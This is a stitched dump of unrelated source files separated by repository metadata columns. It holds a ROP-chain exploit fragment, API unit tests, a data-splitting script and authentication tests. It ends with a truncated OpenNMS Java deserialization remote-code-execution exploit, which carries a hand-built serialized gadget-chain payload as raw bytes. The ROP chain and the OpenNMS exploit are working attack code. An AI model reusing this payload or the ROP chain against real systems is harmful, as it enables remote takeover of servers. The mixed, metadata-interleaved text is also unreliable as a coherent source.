code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x49c7ad) # mov rsp, rcx; ret;
print len(code)
code += __puts(wrong_prompt)
code += __exit(0)
print len(code)
code += __puts(correct_prompt)
# 0x0000000000425ef9: add rax, rcx; ret;
# 0x0000000000488064: mov qword ptr [rbx + 0x18], rax; pop rbx; ret;
# 0x0000000000426e48: mov rax, rdx; ret;
# 0x0000000000420627: mov rdi, rax; pop rbx; pop rbp; pop r12; jmp rcx;
# 0x0000000000423b08: sub rax, rdi; ret;
# 0x000000000041072c: dec dword ptr [rax + 1]; ret;
# 0x00000000004358b8: pop rcx; jmp qword ptr [rdx - 0xf];
# 0x000000000047a44d: dec ecx; ret;
# 0x000000000047ce2f: imul ecx; ret;
# 0x000000000043b430: mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
# 0x00000000004290f3: mov ecx, dword ptr [rdx + rcx*4]; mov eax, dword ptr [rdx + rax*4]; sub eax, ecx; ret;
# 0x000000000046f6bb: and ecx, edi; jmp qword ptr [rsi - 0x70];
# 0x00000000004354d1: mov edx, dword ptr [rsi]; mov qword ptr [rdi], rdx; ret;
# 0x000000000049c7ad: mov rsp, rcx; ret;
# 0x0000000000426133: add rax, rdi; ret;
# 0x000000000040dd0f: and bl, dh; ret;
# 0x0000000000416a6f: neg eax; ret;
# 0x0000000000416a6c: setne al; neg eax; ret;
# 0x00000000004260df: xor rax, rax; ret;
# 0x000000000045612a: xor ecx, dword ptr [rbx]; jmp rax;
# 0x00000000004002e1: ret;
# 0x000000000049d053: mov dword ptr [rax - 0x7d], ecx; ret;
# 0x000000000043b3d1: mov ecx, dword ptr [rsi]; mov word ptr [rdi], cx; mov byte ptr [rdi + 2], dh; ret;
# 0x0000000000425efa: add eax, ecx; ret;
# 0x0000000000426134: add eax, edi; ret;
# 0x0000000000401707: pop rsi; ret;
code += __exit(0)
f = open('binary', 'wb')
f.write(data + p32(len(code)) + code)
f.close()
| 35.134465
| 111
| 0.62702
| 4,491
| 26,913
| 3.710755
| 0.048096
| 0.207081
| 0.162616
| 0.09517
| 0.880228
| 0.867927
| 0.858086
| 0.849685
| 0.843504
| 0.818542
| 0
| 0.210519
| 0.200275
| 26,913
| 765
| 112
| 35.180392
| 0.563769
| 0.463977
| 0
| 0.822828
| 0
| 0
| 0.005163
| 0
| 0
| 0
| 0.230262
| 0
| 0
| 0
| null | null | 0
| 0.001704
| null | null | 0.010221
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d291dff1674e4197d55186d4a69dc8b3362e7ecb
| 8,998
|
py
|
Python
|
app/tests/testDatabaseOpenURL.py
|
Psychoanalytic-Electronic-Publishing/OpenPubArchive-Content-Server
|
031b79b8e0dd5e1c22e2a51394cab846763a451a
|
[
"Apache-2.0"
] | null | null | null |
app/tests/testDatabaseOpenURL.py
|
Psychoanalytic-Electronic-Publishing/OpenPubArchive-Content-Server
|
031b79b8e0dd5e1c22e2a51394cab846763a451a
|
[
"Apache-2.0"
] | 115
|
2020-09-02T20:01:26.000Z
|
2022-03-30T11:47:23.000Z
|
app/tests/testDatabaseOpenURL.py
|
Psychoanalytic-Electronic-Publishing/OpenPubArchive-Content-Server
|
031b79b8e0dd5e1c22e2a51394cab846763a451a
|
[
"Apache-2.0"
] | 2
|
2020-10-15T13:52:10.000Z
|
2020-10-20T13:42:51.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#2020.0610 # Upgraded tests to v2; set up tests against AOP which seems to be discontinued and thus constant
import unittest
import requests
from unitTestConfig import base_plus_endpoint_encoded, headers
class TestDatabaseOpenURL(unittest.TestCase):
def test_search_issn(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?issn=1018-2756')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_set[0]["issn"] == '1018-2756')
def test_search_eissn(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?eissn=1018-2756')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_set[0]["issn"] == '1018-2756')
def test_search_isbn(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?isbn=0422725501')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_info["count"] >= 1)
def test_search_title(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?title=*ego*')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_info["count"] >= 1)
def test_search_stitle(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?stitle="International Journal*"')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
print (response_set[0]["PEPCode"])
assert(response_info["count"] >= 1)
# atitle: str=Query(None, title=opasConfig.TITLE_TITLE, description=opasConfig.DESCRIPTION_TITLE),
def test_search_aufirst(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?aufirst=David')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_info["count"] >= 100)
assert('David' in response_set[0]["authorMast"])
def test_search_aulast(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?aulast=Tuckett')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
print (response_set[0]["authorMast"])
assert(response_set[0]["authorMast"][0:13] == 'David Tuckett')
def test_search_volume(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?volume=101')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_info["count"] >= 1)
assert(response_set[0]["vol"] == '101')
def test_search_issue(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?issue=4')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_info["count"] >= 1)
assert(response_set[0]["issue"] == '4')
def test_search_spage(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?spage=5')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_info["count"] >= 1)
def test_search_epage(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?epage=49')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_info["count"] >= 1)
assert(response_set[0]["pgEnd"] == '49')
def test_search_pages(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?pages=31')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_info["count"] >= 1)
assert(response_set[0]["pgStart"] == '31')
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?pages=22-49')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_set[0]["pgStart"] == '22')
assert(response_set[0]["pgEnd"] == '49')
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?pages=79-')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_set[0]["pgStart"] == '79')
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?pages=-49')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_info["count"] >= 1)
assert(response_set[0]["pgEnd"] == '49')
def test_search_date(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?date=2021')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_info["count"] >= 1)
def test_search_artnum(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?artnum=IJP.100.*')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_info["count"] >= 1)
assert(response_set[0]["PEPCode"] == 'IJP')
assert(response_set[0]["vol"] == '100')
def test_search_artnum(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?artnum=PB.010.*&sort=author')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_info["count"] >= 1)
assert(response_set[0]["PEPCode"] == 'PB')
def test_search_date_sort_offset(self):
full_URL = base_plus_endpoint_encoded('/v2/Database/OpenURL/?date=1999&sort=author&limit=2&offset=2')
response = requests.get(full_URL, headers=headers)
assert(response.ok == True)
r = response.json()
print (r)
response_info = r["documentList"]["responseInfo"]
response_set = r["documentList"]["responseSet"]
assert(response_info["count"] >= 1)
if __name__ == '__main__':
unittest.main()
| 41.851163
| 109
| 0.634697
| 1,034
| 8,998
| 5.319149
| 0.112186
| 0.119636
| 0.058182
| 0.083636
| 0.855636
| 0.845636
| 0.841091
| 0.841091
| 0.841091
| 0.841091
| 0
| 0.022679
| 0.220827
| 8,998
| 215
| 110
| 41.851163
| 0.761803
| 0.027228
| 0
| 0.72043
| 0
| 0.005376
| 0.208824
| 0.077723
| 0
| 0
| 0
| 0
| 0.258065
| 1
| 0.086022
| false
| 0
| 0.016129
| 0
| 0.107527
| 0.112903
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d292d59b040b5c086a1c46156762e75be90db593
| 89
|
py
|
Python
|
deep_coffee/__init__.py
|
Tauranis/deep_coffee
|
7e620ac694ea8061961bbef1b73365194d8de858
|
[
"MIT"
] | 13
|
2019-10-25T13:51:18.000Z
|
2021-12-13T23:18:34.000Z
|
deep_coffee/__init__.py
|
junepass6/deep_coffee
|
7e620ac694ea8061961bbef1b73365194d8de858
|
[
"MIT"
] | 5
|
2020-11-13T17:41:51.000Z
|
2022-02-09T23:33:58.000Z
|
deep_coffee/__init__.py
|
junepass6/deep_coffee
|
7e620ac694ea8061961bbef1b73365194d8de858
|
[
"MIT"
] | 8
|
2020-04-14T17:42:42.000Z
|
2022-02-03T06:09:44.000Z
|
import deep_coffee
import deep_coffee.image_proc
import deep_coffee.image_proc.crop_beans
| 29.666667
| 40
| 0.910112
| 15
| 89
| 5
| 0.466667
| 0.4
| 0.64
| 0.56
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05618
| 89
| 3
| 40
| 29.666667
| 0.892857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d29e28e9f5467e4a773a847188ac1cc4bbc596e6
| 2,174
|
py
|
Python
|
processingAndVisualization/code/pythonCode/oldCode/doseFilter.py
|
sorgerlab/pCycIF_Segmentation
|
264de47702774be4d75800030e100ff7f4ee9b7d
|
[
"MIT"
] | null | null | null |
processingAndVisualization/code/pythonCode/oldCode/doseFilter.py
|
sorgerlab/pCycIF_Segmentation
|
264de47702774be4d75800030e100ff7f4ee9b7d
|
[
"MIT"
] | 8
|
2018-10-31T21:59:41.000Z
|
2018-11-30T15:09:16.000Z
|
processingAndVisualization/code/pythonCode/oldCode/doseFilter.py
|
sorgerlab/pCycIF_Segmentation
|
264de47702774be4d75800030e100ff7f4ee9b7d
|
[
"MIT"
] | null | null | null |
import pandas as pd
from sklearn.cluster import KMeans
import numpy as np
import glob
for drug in ['dmso','soraf']:
for fn in sorted(glob.glob('/home/bobby/Dropbox/MATLAB/cardiotoxCycif/segmentation/newSegmentationData/dapiAdded/csvProcessing/clusteredData/proteome/%s/*.csv' % drug)):
# print(fn)
df = pd.read_csv(fn)
#split on drugs
highdose_idx = df.index[df['Dose']==3].tolist()
highdose = df.loc[highdose_idx]
lowdose_idx = df.index[df['Dose']==1].tolist()
lowdose = df.loc[lowdose_idx]
#write files
highdose.to_csv('/home/bobby/Dropbox/MATLAB/cardiotoxCycif/segmentation/newSegmentationData/dapiAdded/csvProcessing/doseSeparated/proteome/highdose/%s/highdose_%s' % (drug,fn.split('/')[-1]))
lowdose.to_csv('/home/bobby/Dropbox/MATLAB/cardiotoxCycif/segmentation/newSegmentationData/dapiAdded/csvProcessing/doseSeparated/proteome/lowdose/%s/lowdose_%s' % (drug,fn.split('/')[-1]))
for drug in ['dmso','soraf']:
for fn in sorted(glob.glob('/home/bobby/Dropbox/MATLAB/cardiotoxCycif/segmentation/newSegmentationData/dapiAdded/csvProcessing/clusteredData/signaling/%s/*.csv' % drug)):
# print(fn)
df = pd.read_csv(fn)
#split on drugs
highdose_idx = df.index[df['Dose']==10].tolist()
highdose = df.loc[highdose_idx]
meddose_idx = df.index[df['Dose']==3].tolist()
meddose = df.loc[highdose_idx]
lowdose_idx = df.index[df['Dose']==1].tolist()
lowdose = df.loc[lowdose_idx]
#write files
highdose.to_csv('/home/bobby/Dropbox/MATLAB/cardiotoxCycif/segmentation/newSegmentationData/dapiAdded/csvProcessing/doseSeparated/signaling/highdose/%s/highdose_%s' % (drug,fn.split('/')[-1]))
meddose.to_csv('/home/bobby/Dropbox/MATLAB/cardiotoxCycif/segmentation/newSegmentationData/dapiAdded/csvProcessing/doseSeparated/signaling/meddose/%s/meddose_%s' % (drug,fn.split('/')[-1]))
lowdose.to_csv('/home/bobby/Dropbox/MATLAB/cardiotoxCycif/segmentation/newSegmentationData/dapiAdded/csvProcessing/doseSeparated/signaling/lowdose/%s/lowdose_%s' % (drug,fn.split('/')[-1]))
| 48.311111
| 200
| 0.698712
| 264
| 2,174
| 5.670455
| 0.200758
| 0.042084
| 0.074816
| 0.102872
| 0.915832
| 0.915832
| 0.890448
| 0.870407
| 0.801603
| 0.801603
| 0
| 0.005917
| 0.144894
| 2,174
| 44
| 201
| 49.409091
| 0.799354
| 0.034959
| 0
| 0.4
| 0
| 0.28
| 0.492795
| 0.472142
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.16
| 0
| 0.16
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d29e3df4c912930da6602cd5ed46b2640bbd8495
| 2,746
|
py
|
Python
|
app/test/test_auth.py
|
n0nvme/yatb
|
3d2e7d7e3b2c694e4ae8a662becbe0984cf03210
|
[
"Apache-2.0"
] | null | null | null |
app/test/test_auth.py
|
n0nvme/yatb
|
3d2e7d7e3b2c694e4ae8a662becbe0984cf03210
|
[
"Apache-2.0"
] | null | null | null |
app/test/test_auth.py
|
n0nvme/yatb
|
3d2e7d7e3b2c694e4ae8a662becbe0984cf03210
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import datetime
import hmac
import hashlib
from . import client as client_cl, app, TestClient
from .. import schema, config
client = client_cl
def test_register(client: TestClient):
resp = client.post(app.url_path_for("api_users_register"), json=schema.UserForm(username="Rubikoid", password="123").dict())
assert resp.status_code == 200, resp.text
assert resp.text == '"ok"', resp.text
def test_login(client: TestClient):
test_register(client)
resp = client.post(app.url_path_for("api_token"), json=schema.UserForm(username="Rubikoid", password="123").dict())
assert resp.status_code == 200, resp.text
assert resp.text == '"ok"', resp.text
def test_admin(client: TestClient):
test_login(client)
resp = client.get(app.url_path_for("api_admin_users_me"))
# print(resp.json())
assert resp.status_code == 200, resp.text
assert resp.json()["is_admin"] is True, resp.json()
assert resp.json()["username"] == "Rubikoid", resp.json()
def test_admin_fail(client: TestClient):
resp1 = client.post(app.url_path_for("api_users_register"), json=schema.UserForm(username="Not_Rubikoid", password="123").dict())
assert resp1.status_code == 200, resp1.text
assert resp1.text == '"ok"', resp1.text
resp2 = client.post(app.url_path_for("api_token"), json=schema.UserForm(username="Not_Rubikoid", password="123").dict())
assert resp2.status_code == 200, resp2.text
assert resp2.text == '"ok"', resp2.text
resp3 = client.get(app.url_path_for("api_admin_users_me"))
assert resp3.status_code == 403, resp3.text
def test_not_existing_user(client: TestClient):
resp1 = client.post(app.url_path_for("api_token"), json=schema.UserForm(username="Not_Existing_Account", password="123").dict())
assert resp1.status_code == 401, resp1.text
def test_invalid_password(client: TestClient):
resp1 = client.post(app.url_path_for("api_users_register"), json=schema.UserForm(username="Not_Rubikoid", password="123").dict())
assert resp1.status_code == 200, resp1.text
assert resp1.text == '"ok"', resp1.text
resp2 = client.post(app.url_path_for("api_token"), json=schema.UserForm(username="Not_Rubikoid", password="1234").dict())
assert resp2.status_code == 401, resp2.text
def test_register_existing_user(client: TestClient):
resp1 = client.post(app.url_path_for("api_users_register"), json=schema.UserForm(username="Not_Rubikoid", password="123").dict())
assert resp1.status_code == 200, resp1.text
assert resp1.text == '"ok"', resp1.text
resp2 = client.post(app.url_path_for("api_users_register"), json=schema.UserForm(username="Not_Rubikoid", password="1234").dict())
assert resp2.status_code == 403, resp2.text
| 40.382353
| 134
| 0.72287
| 390
| 2,746
| 4.887179
| 0.14359
| 0.034627
| 0.057712
| 0.075026
| 0.737671
| 0.729801
| 0.729801
| 0.710913
| 0.706716
| 0.685205
| 0
| 0.039183
| 0.126366
| 2,746
| 67
| 135
| 40.985075
| 0.755315
| 0.006555
| 0
| 0.304348
| 0
| 0
| 0.127293
| 0
| 0
| 0
| 0
| 0
| 0.413043
| 1
| 0.152174
| false
| 0.217391
| 0.130435
| 0
| 0.282609
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
d2c1a23f2330005cb2e7df6aa9bf355b3a035503
| 7,113
|
py
|
Python
|
Java/opennms_rce.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Java/opennms_rce.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Java/opennms_rce.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#! /usr/bin/env python3
# Credits:
# http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/#opennms
# nessus/plugins/opennms_java_serialize.nasl
# cobbled together by pancho
import socket
import sys
def build(cmd):
blob_header = '\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x05\x70\x77\x6e\x65\x64\x73\x7d\x00\x00\x00\x01\x00\x0f\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x52\x65\x6d\x6f\x74\x65\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x70\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7e\x00\x00\x73\x71\x00\x7e\x00\x05\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x70\x78\x71\x00\x7e\x00\x02\x73\x71\x00\x7e\x00\x05\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x70\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x24\x73\x71\x00\x7e\x00\x1c\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x21\x73\x71\x00\x7e\x00\x1c\x75\x72\x00\x13\x5b\x4c\x6a\x61\